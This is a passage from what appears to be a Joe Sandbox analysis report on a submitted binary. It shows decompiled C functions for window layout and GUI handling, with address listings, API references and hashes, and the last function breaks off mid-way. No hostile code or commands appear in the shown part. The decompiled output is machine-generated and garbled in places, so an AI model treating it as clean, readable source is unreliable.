                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$GetLayout
                  • API String ID: 4275029093-2396518106
                  • Opcode ID: b6a56586d83474ba617ffbc4177e26df6ea37e987274d3318c0e5c86094dc973
                  • Instruction ID: c3a8ff1e6a70369a334e9d65533ec26824e18546c235e0bade0a9994c07655bf
                  • Opcode Fuzzy Hash: b6a56586d83474ba617ffbc4177e26df6ea37e987274d3318c0e5c86094dc973
                  • Instruction Fuzzy Hash: 1AD0C232B442207BD2212F726D4DA163E80BB89BA33594661BC26E31D0CAA8CC008758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041B7FA, Relevance: 7.6, APIs: 5, Instructions: 121COMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E0041B7FA(void* __ecx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				char _v12;
				int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t46;
				int _t48;
				int _t50;
				signed int _t57;
				int _t71;
				void* _t73;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				int _t78;
				void* _t79;
				signed int _t84;
				int _t87;
				signed int _t93;
				void* _t95;
				void* _t96;
				struct tagRECT* _t98;

				_t84 = _a4 * 0x28;
				_t95 = __ecx;
				_t96 = _t84 +  *((intOrPtr*)(__ecx + 0xb0));
				E0041B77A(__ecx, __eflags,  &_v12);
				_t87 =  *(_t96 + 0x24);
				_t93 = 0 |  *(_t96 + 0x20) - _t87 < 0x00000000;
				_t46 =  *((intOrPtr*)(__ecx + 0x10c));
				if(_t46 == 0) {
					 *(_t96 + 0x18) =  *(_t96 + 0x20);
					_t48 =  *(_t96 + 0x24);
					goto L12;
				} else {
					_t73 = _t46 - 1;
					if(_t73 == 0) {
						 *(_t96 + 0x1c) = _t87;
						_t74 =  *(_t96 + 0x20);
						__eflags = _t93;
						if(_t93 == 0) {
							_t76 = _t74 * 3 - _t87;
							__eflags = _t76;
						} else {
							_t76 = _t74 + _t87;
						}
						asm("cdq");
						_t77 = _t76 - _t93;
						__eflags = _t77;
						_t78 = _t77 >> 1;
						goto L10;
					} else {
						_t79 = _t73 - 1;
						if(_t79 == 0) {
							if(_t93 == 0) {
								 *(_t96 + 0x1c) = _t87;
								_t78 =  *(_t96 + 0x20) +  *(_t96 + 0x20) -  *(_t96 + 0x24);
								L10:
								 *(_t96 + 0x18) = _t78;
							} else {
								_t48 = _t79 + 1;
								 *(_t96 + 0x18) = _t48;
								L12:
								 *(_t96 + 0x1c) = _t48;
							}
						}
					}
				}
				_v20 = MulDiv( *(_t96 + 0x10),  *(_t96 + 0x18),  *(_t96 + 0x1c));
				_t50 = MulDiv( *(_t96 + 0x14),  *(_t96 + 0x18),  *(_t96 + 0x1c));
				_t98 =  *((intOrPtr*)(_t95 + 0xb0)) + _t84;
				SetRect(_t98, 8, 8, _v20 + 0xb, _t50 + 0xb);
				if( *((intOrPtr*)(_t95 + 0x10c)) != 0) {
					_push(0x4527fc);
					_push( &_v12);
					_push(_t98->bottom - _t98->top + 0x10);
					_t57 = _t98->right - _t98->left + 0x10;
					__eflags = _t57;
					_push(_t57);
					_push(1);
					return E00419E93(_t84, _t95, _t95, _t98, _t57);
				}
				asm("cdq");
				asm("cdq");
				_t71 = OffsetRect(_t98, (_t98->left - _t98->right + _v12 - _t93 >> 1) - 1, (_t98->top - _t98->bottom + _v8 - _t93 >> 1) - 1);
				if(_a4 == 1) {
					return OffsetRect(_t98,  *(_t95 + 0x11c), 0);
				}
				return _t71;
			}



























                  0x0041b806
                  0x0041b80b
                  0x0041b813
                  0x0041b81a
                  0x0041b81f
                  0x0041b82d
                  0x0041b830
                  0x0041b833
                  0x0041b874
                  0x0041b877
                  0x00000000
                  0x0041b835
                  0x0041b835
                  0x0041b836
                  0x0041b854
                  0x0041b857
                  0x0041b85a
                  0x0041b85c
                  0x0041b865
                  0x0041b865
                  0x0041b85e
                  0x0041b85e
                  0x0041b85e
                  0x0041b867
                  0x0041b868
                  0x0041b868
                  0x0041b86a
                  0x00000000
                  0x0041b838
                  0x0041b838
                  0x0041b839
                  0x0041b83d
                  0x0041b847
                  0x0041b84f
                  0x0041b86c
                  0x0041b86c
                  0x0041b83f
                  0x0041b83f
                  0x0041b840
                  0x0041b87a
                  0x0041b87a
                  0x0041b87a
                  0x0041b83d
                  0x0041b839
                  0x0041b836
                  0x0041b88f
                  0x0041b898
                  0x0041b8b3
                  0x0041b8b6
                  0x0041b8c3
                  0x0041b90b
                  0x0041b913
                  0x0041b917
                  0x0041b918
                  0x0041b918
                  0x0041b91b
                  0x0041b91c
                  0x00000000
                  0x0041b920
                  0x0041b8d4
                  0x0041b8e3
                  0x0041b8eb
                  0x0041b8f1
                  0x00000000
                  0x0041b8fc
                  0x0041b929

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Offset
                  • String ID:
                  • API String ID: 3858320380-0
                  • Opcode ID: 16094ef62ffa5adcbd37ecc287b6900c4b621fc2971993f42e863f422f150e29
                  • Instruction ID: ccfb9802a9b83407f1a75f79d1d276e713992f87681ada11129c972e46a4a06c
                  • Opcode Fuzzy Hash: 16094ef62ffa5adcbd37ecc287b6900c4b621fc2971993f42e863f422f150e29
                  • Instruction Fuzzy Hash: C2417C71600A05AFC724DF69C984BA6BBF9FF48704B048A2DE986C2651D734F8858F98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041B982, Relevance: 7.6, APIs: 5, Instructions: 120COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0041B982(intOrPtr __ecx, intOrPtr __edx, int* _a4, signed int* _a8) {
				intOrPtr _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				signed int _t56;
				signed int* _t68;
				signed int _t75;
				int _t82;
				intOrPtr* _t86;
				int* _t88;
				intOrPtr _t90;
				int _t96;
				intOrPtr _t98;
				intOrPtr _t101;
				signed int* _t103;
				intOrPtr _t108;

				_t98 = __edx;
				_t88 = _a4;
				_t101 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10c)) != 0) {
					_t86 = E0041954D(__ecx,  &(_v24.right));
					 *_t88 =  *_t88 +  *_t86;
					_t88[1] = _t88[1] +  *((intOrPtr*)(_t86 + 4));
				}
				GetClientRect( *(_t101 + 0x20),  &_v40);
				 *_a8 = 0;
				if( *((intOrPtr*)(_t101 + 0x118)) > 0) {
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t108 = _v8;
						if( *((intOrPtr*)(_t108 + 0x10c)) == 0) {
							goto L12;
						}
						asm("cdq");
						_t75 = _v40.right - _v24.right - _v40.left + _v24.left - 0x10 - _t98;
						_t98 = _v24.top;
						_t96 = (_t75 >> 1) - 1;
						asm("cdq");
						_t82 = (_v40.bottom - _v24.bottom - _v40.top + _t98 - 0x10 - _t98 >> 1) - 1;
						if(_t96 < 0) {
							_t96 = 0;
						}
						if(_t82 < 0) {
							_t82 = 0;
						}
						OffsetRect( &_v24, _t96, _t82);
						L12:
						_push(_t88[1]);
						if(PtInRect( &_v24,  *_t88) != 0) {
							_t103 = _a8;
							_t90 =  *((intOrPtr*)(_t108 + 0xb0));
							_t56 =  *_t103 * 0x28;
							_t88[1] = _t88[1] -  *((intOrPtr*)(_t56 + _t90 + 4));
							 *_t88 =  *_t88 -  *((intOrPtr*)(_t56 + _t90));
							 *_t88 = MulDiv( *_t88,  *( *_t103 * 0x28 +  *((intOrPtr*)(_t108 + 0xb0)) + 0x1c),  *( *_t103 * 0x28 +  *((intOrPtr*)(_t108 + 0xb0)) + 0x18));
							_t88[1] = MulDiv(_t88[1],  *( *_t103 * 0x28 +  *((intOrPtr*)(_t108 + 0xb0)) + 0x1c),  *( *_t103 * 0x28 +  *((intOrPtr*)(_t108 + 0xb0)) + 0x18));
							return 1;
						}
						_t68 = _a8;
						 *_t68 =  *_t68 + 1;
						if( *_t68 <  *((intOrPtr*)(_t108 + 0x118))) {
							_t101 = _t108;
							continue;
						}
						goto L3;
					}
				} else {
					L3:
					return 0;
				}
			}


















                  0x0041b982
                  0x0041b98b
                  0x0041b990
                  0x0041b994
                  0x0041b99d
                  0x0041b9a3
                  0x0041b9ad
                  0x0041b9af
                  0x0041b9af
                  0x0041b9b9
                  0x0041b9c2
                  0x0041b9ca
                  0x0041b9d7
                  0x0041b9e8
                  0x0041b9e9
                  0x0041b9ea
                  0x0041b9eb
                  0x0041b9ec
                  0x0041b9f6
                  0x00000000
                  0x00000000
                  0x0041ba08
                  0x0041ba09
                  0x0041ba0b
                  0x0041ba1b
                  0x0041ba20
                  0x0041ba25
                  0x0041ba28
                  0x0041ba2a
                  0x0041ba2a
                  0x0041ba2e
                  0x0041ba30
                  0x0041ba30
                  0x0041ba38
                  0x0041ba3e
                  0x0041ba3e
                  0x0041ba4f
                  0x0041ba69
                  0x0041ba6e
                  0x0041ba74
                  0x0041ba7e
                  0x0041ba81
                  0x0041ba9f
                  0x0041babd
                  0x00000000
                  0x0041bac2
                  0x0041ba51
                  0x0041ba54
                  0x0041ba5e
                  0x0041b9d5
                  0x00000000
                  0x0041b9d5
                  0x00000000
                  0x0041ba64
                  0x0041b9cc
                  0x0041b9cc
                  0x00000000
                  0x0041b9cc

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$ClientOffset
                  • String ID:
                  • API String ID: 3549191583-0
                  • Opcode ID: de84f664adc04d7a299dcc5e4241c8d52e4674e42483e1f77b1656c7517c78ac
                  • Instruction ID: aae755c7d603de1c4d8fe7bf5bc3c6ce9542f4a2377bef0a616500828aae3046
                  • Opcode Fuzzy Hash: de84f664adc04d7a299dcc5e4241c8d52e4674e42483e1f77b1656c7517c78ac
                  • Instruction Fuzzy Hash: 0C415E76600606EFCB05CFA9C984DEABBF6FF49300B05856AE915EB264D734E941CF90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00419E93, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00419E93(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				struct tagPOINT* _t75;
				long* _t77;
				long* _t80;
				struct tagPOINT* _t81;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				struct tagPOINT* _t97;
				signed int _t98;
				signed int _t107;
				void* _t115;
				signed int _t117;
				signed int _t118;
				void* _t120;
				void* _t121;
				void* _t122;

				_t122 = __eflags;
				_push(0x18);
				E00431A9B(E0044B727, __ebx, __edi, __esi);
				_t120 = __ecx;
				 *(_t121 - 0x10) =  *(__ecx + 0x5c);
				 *(__ecx + 0x5c) =  *(_t121 + 8);
				 *((intOrPtr*)(__ecx + 0x60)) =  *((intOrPtr*)(_t121 + 0xc));
				_push(0);
				 *((intOrPtr*)(__ecx + 0x64)) =  *((intOrPtr*)(_t121 + 0x10));
				E00422EAE(__ebx, _t121 - 0x24, __edi, __ecx, _t122);
				 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
				E004225FF(_t121 - 0x24,  *((intOrPtr*)(_t120 + 0x5c)));
				_t115 = LPtoDP;
				_t75 = _t120 + 0x68;
				_t75->x =  *(_t120 + 0x60);
				_t75->y =  *(_t120 + 0x64);
				LPtoDP( *(_t121 - 0x1c), _t75, 1);
				_t77 =  *(_t121 + 0x14);
				_t97 = _t120 + 0x70;
				_t97->x =  *_t77;
				_t97->y = _t77[1];
				LPtoDP( *(_t121 - 0x1c), _t97, 1);
				_t80 =  *(_t121 + 0x18);
				_t81 = _t120 + 0x78;
				_t81->x =  *_t80;
				_t81->y = _t80[1];
				LPtoDP( *(_t121 - 0x1c), _t81, 1);
				_t83 =  *(_t120 + 0x6c);
				if(_t83 < 0) {
					 *(_t120 + 0x6c) =  ~_t83;
				}
				_t84 =  *(_t120 + 0x74);
				if(_t84 < 0) {
					 *(_t120 + 0x74) =  ~_t84;
				}
				_t85 =  *(_t120 + 0x7c);
				_t125 = _t85;
				if(_t85 < 0) {
					 *(_t120 + 0x7c) =  ~_t85;
				}
				 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
				_t86 = E00422F02(_t97, _t121 - 0x24, _t115, _t120, _t125);
				_t107 = 0xa;
				if(_t97->x == 0) {
					_t92 =  *(_t120 + 0x68);
					asm("cdq");
					_t118 = _t107;
					_t86 = _t92 / _t118;
					_t97->x = _t92 / _t118;
				}
				if( *(_t120 + 0x74) == 0) {
					_t91 =  *(_t120 + 0x6c);
					asm("cdq");
					_t117 = _t107;
					_t86 = _t91 / _t117;
					 *(_t120 + 0x74) = _t91 / _t117;
				}
				if( *(_t120 + 0x78) == 0) {
					_t90 = _t97->x;
					asm("cdq");
					_t98 = _t107;
					_t86 = _t90 / _t98;
					 *(_t120 + 0x78) = _t90 / _t98;
				}
				if( *(_t120 + 0x7c) == 0) {
					_t89 =  *(_t120 + 0x74);
					asm("cdq");
					_t86 = _t89 / _t107;
					 *(_t120 + 0x7c) = _t89 / _t107;
				}
				if( *(_t120 + 0x20) != 0) {
					E00419793(_t120);
					_t86 =  *(_t121 - 0x10);
					if( *(_t121 - 0x10) !=  *((intOrPtr*)(_t120 + 0x5c))) {
						_t86 = InvalidateRect( *(_t120 + 0x20), 0, 1);
					}
				}
				return E00431B73(_t86);
			}























                  0x00419e93
                  0x00419e93
                  0x00419e9a
                  0x00419e9f
                  0x00419ea4
                  0x00419eaa
                  0x00419eb0
                  0x00419eb6
                  0x00419ebb
                  0x00419ebe
                  0x00419ec6
                  0x00419ecd
                  0x00419ed5
                  0x00419edb
                  0x00419ee4
                  0x00419ee9
                  0x00419eec
                  0x00419eee
                  0x00419ef6
                  0x00419eff
                  0x00419f01
                  0x00419f04
                  0x00419f06
                  0x00419f0e
                  0x00419f17
                  0x00419f19
                  0x00419f1c
                  0x00419f1e
                  0x00419f23
                  0x00419f27
                  0x00419f27
                  0x00419f2a
                  0x00419f2f
                  0x00419f33
                  0x00419f33
                  0x00419f36
                  0x00419f39
                  0x00419f3b
                  0x00419f3f
                  0x00419f3f
                  0x00419f42
                  0x00419f49
                  0x00419f53
                  0x00419f54
                  0x00419f56
                  0x00419f59
                  0x00419f5a
                  0x00419f5c
                  0x00419f5e
                  0x00419f5e
                  0x00419f64
                  0x00419f66
                  0x00419f69
                  0x00419f6a
                  0x00419f6c
                  0x00419f6e
                  0x00419f6e
                  0x00419f76
                  0x00419f78
                  0x00419f7a
                  0x00419f7b
                  0x00419f7d
                  0x00419f7f
                  0x00419f7f
                  0x00419f85
                  0x00419f87
                  0x00419f8a
                  0x00419f8b
                  0x00419f8d
                  0x00419f8d
                  0x00419f93
                  0x00419f97
                  0x00419f9c
                  0x00419fa2
                  0x00419faa
                  0x00419faa
                  0x00419fa2
                  0x00419fb5

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00419E9A
                    • Part of subcall function 00422EAE: __EH_prolog3.LIBCMT ref: 00422EB5
                    • Part of subcall function 00422EAE: GetWindowDC.USER32(00000000,00000004,00419EC3,00000000,00000018,00418677,00000001,?,?,004527FC,004527FC), ref: 00422EE1
                    • Part of subcall function 004225FF: SetMapMode.GDI32(?,?), ref: 0042261C
                    • Part of subcall function 004225FF: SetMapMode.GDI32(?,?), ref: 00422629
                  • LPtoDP.GDI32(?,00000000,00000001), ref: 00419EEC
                  • LPtoDP.GDI32(?,?,00000001), ref: 00419F04
                  • LPtoDP.GDI32(?,?,00000001), ref: 00419F1C
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00419FAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Mode$InvalidateRectWindow
                  • String ID:
                  • API String ID: 1124340077-0
                  • Opcode ID: 5e92dc9d8927e779996eaefea1d6ec7addeb9903d75ce59e16476182e28c8fb1
                  • Instruction ID: ff3a48c6707479a703a385a6b95aa5d7b8bb46ad7457f72f60557dc521b21950
                  • Opcode Fuzzy Hash: 5e92dc9d8927e779996eaefea1d6ec7addeb9903d75ce59e16476182e28c8fb1
                  • Instruction Fuzzy Hash: 7F410470640B099FDB21DF2AC981AAAB7F5BF49704F10882EE596D77A0D774E841CF14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424CB8, Relevance: 7.6, APIs: 5, Instructions: 100keyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424CB8(void* __ecx, void* __eflags, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				signed int _t44;
				signed int _t48;
				signed int _t52;
				signed int _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;
				void* _t80;

				_t80 = __eflags;
				_t75 = __ecx;
				_v8 = E00412B38(__ecx);
				GetWindowRect( *(__ecx + 0x20),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E0040ED96(_t75, _t80);
				if((_v8 & 0x00001000) == 0) {
					L5:
					__eflags = _t76 - 0xa;
					if(_t76 < 0xa) {
						L7:
						__eflags = _t76 - 4;
						if(_t76 != 4) {
							L16:
							return _t76;
						}
						L8:
						__eflags = _v8 & 0x00000800;
						if((_v8 & 0x00000800) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							__eflags = _v8 & 0x00000200;
							if((_v8 & 0x00000200) == 0) {
								goto L16;
							}
							_t44 = _t76 - 4;
							__eflags = _t44;
							if(_t44 == 0) {
								L21:
								__eflags = _a8 - _v24.bottom;
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							__eflags = _t48;
							if(_t48 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							__eflags = _t52;
							if(_t52 == 0) {
								__eflags = _a8 - _v24.top;
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							__eflags = _t57;
							if(_t57 == 0) {
								__eflags = _a8 - _v24.bottom;
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							__eflags = _t57 == 1;
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
					__eflags = _t76 - 0x11;
					if(_t76 <= 0x11) {
						goto L8;
					}
					goto L7;
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}















                  0x00424cb8
                  0x00424cc3
                  0x00424cca
                  0x00424cd4
                  0x00424ce6
                  0x00424cec
                  0x00424cfa
                  0x00424cfc
                  0x00424d17
                  0x00424d17
                  0x00424d1a
                  0x00424d21
                  0x00424d21
                  0x00424d24
                  0x00424d63
                  0x00000000
                  0x00424d63
                  0x00424d26
                  0x00424d26
                  0x00424d2d
                  0x00424d3e
                  0x00424d44
                  0x00424d4b
                  0x00000000
                  0x00000000
                  0x00424d4f
                  0x00424d4f
                  0x00424d52
                  0x00424da1
                  0x00424da6
                  0x00000000
                  0x00424dac
                  0x00424d54
                  0x00424d54
                  0x00424d57
                  0x00424d95
                  0x00000000
                  0x00424d9b
                  0x00424d59
                  0x00424d59
                  0x00424d5a
                  0x00424d85
                  0x00000000
                  0x00424d8b
                  0x00424d5d
                  0x00424d5d
                  0x00424d5e
                  0x00424d71
                  0x00000000
                  0x00424d7b
                  0x00424d60
                  0x00424d61
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00424d61
                  0x00424d31
                  0x00000000
                  0x00424d31
                  0x00424d1c
                  0x00424d1f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00424d1f
                  0x00424d01
                  0x00424d05
                  0x00424d05
                  0x00424d11
                  0x00000000
                  0x00424d13
                  0x00000000
                  0x00424d13

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetWindowRect.USER32 ref: 00424CD4
                  • GetSystemMetrics.USER32 ref: 00424CE2
                  • GetSystemMetrics.USER32 ref: 00424CE8
                  • GetKeyState.USER32(00000002), ref: 00424D08
                  • InflateRect.USER32(?,00000000,00000000), ref: 00424D3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsRectSystemWindow$InflateLongState
                  • String ID:
                  • API String ID: 2406722796-0
                  • Opcode ID: b7e1fb10cf98936029ff3779083299cd64c9a269c6d8fca835f4ba8cdf550397
                  • Instruction ID: e3ecd6cb329665b2cd8a2448089bf16f9698f38525433f5d73bdf6f6ead89f03
                  • Opcode Fuzzy Hash: b7e1fb10cf98936029ff3779083299cd64c9a269c6d8fca835f4ba8cdf550397
                  • Instruction Fuzzy Hash: F631F732B20128ABDB30DBA8F849AAF77A4EBC5394F954417D502D7180DA7CDD41C659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040FBD2, Relevance: 7.6, APIs: 5, Instructions: 80windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0040FBD2(signed int __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				struct HWND__* _t29;
				signed int _t32;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t53;
				void* _t54;
				void* _t55;

				_t55 = __eflags;
				_t42 = __ebx;
				_push(0x80);
				E00431A9B(E0044B06E, __ebx, __edi, __esi);
				 *(_t54 - 0x10) = __ecx;
				E004125EB(_t54 - 0x38);
				_t45 = _t54 - 0x8c;
				E0040D77C(_t54 - 0x8c, _t55);
				 *(_t54 - 4) = 0;
				_t29 = GetTopWindow( *(__ecx + 0x20));
				while(1) {
					_t53 = _t29;
					if(_t53 == 0) {
						break;
					}
					 *(_t54 - 0x6c) = _t53;
					 *((intOrPtr*)(_t54 - 0x34)) = GetDlgCtrlID(_t53);
					 *((intOrPtr*)(_t54 - 0x24)) = _t54 - 0x8c;
					_t32 = E0040EE68(_t45, 0, _t53, __eflags, _t53);
					__eflags = _t32;
					if(_t32 == 0) {
						L3:
						_t45 =  *(_t54 - 0x10);
						__eflags = E0041246B( *(_t54 - 0x10), 0, _t53,  *((intOrPtr*)(_t54 - 0x34)), 0xffffffff, _t54 - 0x38, 0);
						if(__eflags == 0) {
							_t42 =  *(_t54 + 0xc);
							__eflags = _t42;
							if(_t42 != 0) {
								_t36 = SendMessageA( *(_t54 - 0x6c), 0x87, 0, 0);
								__eflags = _t36 & 0x00002000;
								if((_t36 & 0x00002000) == 0) {
									L10:
									_t42 = 0;
									__eflags = 0;
								} else {
									_t38 = E00412B38(_t54 - 0x8c) & 0x0000000f;
									__eflags = _t38 - 3;
									if(_t38 == 3) {
										goto L10;
									} else {
										__eflags = _t38 - 6;
										if(_t38 == 6) {
											goto L10;
										} else {
											__eflags = _t38 - 7;
											if(_t38 == 7) {
												goto L10;
											} else {
												__eflags = _t38 - 9;
												if(_t38 == 9) {
													goto L10;
												}
											}
										}
									}
								}
							}
							_t45 = _t54 - 0x38;
							E00412611(_t54 - 0x38,  *((intOrPtr*)(_t54 + 8)), _t42);
						}
					} else {
						_t45 = _t32;
						__eflags = E0041246B(_t32, 0, _t53, 0, 0xbd11ffff, _t54 - 0x38, 0);
						if(__eflags == 0) {
							goto L3;
						}
					}
					_t29 = GetWindow(_t53, 2);
				}
				_t21 = _t54 - 4;
				 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
				 *(_t54 - 0x6c) = 0;
				return E00431B73(E0040F76D(_t42, _t54 - 0x8c, 0, _t53,  *_t21));
			}










                  0x0040fbd2
                  0x0040fbd2
                  0x0040fbd2
                  0x0040fbdc
                  0x0040fbe3
                  0x0040fbe9
                  0x0040fbee
                  0x0040fbf4
                  0x0040fbfe
                  0x0040fc01
                  0x0040fcaf
                  0x0040fcaf
                  0x0040fcb3
                  0x00000000
                  0x00000000
                  0x0040fc0d
                  0x0040fc16
                  0x0040fc20
                  0x0040fc23
                  0x0040fc28
                  0x0040fc2a
                  0x0040fc42
                  0x0040fc42
                  0x0040fc54
                  0x0040fc56
                  0x0040fc58
                  0x0040fc5b
                  0x0040fc5d
                  0x0040fc69
                  0x0040fc6f
                  0x0040fc74
                  0x0040fc98
                  0x0040fc98
                  0x0040fc98
                  0x0040fc76
                  0x0040fc81
                  0x0040fc84
                  0x0040fc87
                  0x00000000
                  0x0040fc89
                  0x0040fc89
                  0x0040fc8c
                  0x00000000
                  0x0040fc8e
                  0x0040fc8e
                  0x0040fc91
                  0x00000000
                  0x0040fc93
                  0x0040fc93
                  0x0040fc96
                  0x00000000
                  0x00000000
                  0x0040fc96
                  0x0040fc91
                  0x0040fc8c
                  0x0040fc87
                  0x0040fc74
                  0x0040fc9e
                  0x0040fca1
                  0x0040fca1
                  0x0040fc2c
                  0x0040fc37
                  0x0040fc3e
                  0x0040fc40
                  0x00000000
                  0x00000000
                  0x0040fc40
                  0x0040fca9
                  0x0040fca9
                  0x0040fcb9
                  0x0040fcb9
                  0x0040fcc3
                  0x0040fcd0

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040FBDC
                  • GetTopWindow.USER32(?), ref: 0040FC01
                  • GetDlgCtrlID.USER32 ref: 0040FC10
                  • SendMessageA.USER32(00000087,00000087,00000000,00000000), ref: 0040FC69
                  • GetWindow.USER32(00000000,00000002), ref: 0040FCA9
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$CtrlH_prolog3MessageSend
                  • String ID:
                  • API String ID: 849854284-0
                  • Opcode ID: b91585d9f724a2dc4af9cf88251d3bb40864db0c4308cd8b887a07d56b25a55e
                  • Instruction ID: 2ec04b22e0cf5ce468d851c06280b4cd055a4feba6f59ded0add44badfe227aa
                  • Opcode Fuzzy Hash: b91585d9f724a2dc4af9cf88251d3bb40864db0c4308cd8b887a07d56b25a55e
                  • Instruction Fuzzy Hash: 0B216F71804218AAEB25EFA6CD8A9EEB674BF55304F10463AF811F35D0EB785E44CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405112, Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00405112(intOrPtr __ecx, void* __eflags, struct tagRECT* _a4) {
				intOrPtr _v8;
				signed int _v12;
				void* __ebx;
				void* _t23;
				void* _t39;
				long _t41;
				void* _t45;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				_t45 = E0040474E(__ecx);
				_t39 = E004045BE(0, _t45, 0);
				if(_t39 == 0 || _t39 == _v8) {
					_v12 = GetWindowLongA( *(_t45 + 0xe8), 0xffffffec);
